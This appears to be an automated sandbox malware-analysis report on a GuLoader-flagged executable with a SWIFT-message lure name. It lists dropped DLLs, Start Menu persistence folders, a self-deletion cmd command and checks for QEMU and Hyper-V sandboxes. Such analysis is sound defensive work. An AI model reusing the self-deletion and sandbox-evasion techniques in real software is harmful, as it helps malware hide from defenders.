00000004.00000003.7968362187.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7968362187.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7983291992.000000001DD14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019749617.000000001E6E4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7982644058.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020249501.000000001DA70000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020696835.000000001DA80000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7990657320.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7989641253.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.4.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000001.00000002.7934819719.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.7688018397.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_10002DE0 push eax; ret	1_2_10002E0E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AFA23D push esp; ret	1_2_02AFA248
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF4065 push ds; retf	1_2_02AF4067
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AFA172 push edx; retf	1_2_02AFA1AE

Source: msvcp140.dll.4.dr

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_10001B18

Source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr

Static PE information: 0xE0D5091C [Wed Jul 13 01:51:24 2089 UTC]

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Bikes	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Bikes\Bombekrater210	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Bikes\Bombekrater210\Cykelhandlerne.Sme	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\libxml2-2.0.typelib	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Coasting102.For	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Castrate	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Castrate\memstat.c	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes\selection-end-symbolic.symbolic.png	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe			Jump to behavior

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Code function: 1_2_02AF06AF rdtsc

1_2_02AF06AF

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_004065C5 FindFirstFileW,FindClose,	1_2_004065C5
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405990
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_00402862 FindFirstFileW,	1_2_00402862

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	API call chain: ExitProcess graph end node			graph_1-9505
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	API call chain: ExitProcess graph end node			graph_1-9509

Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
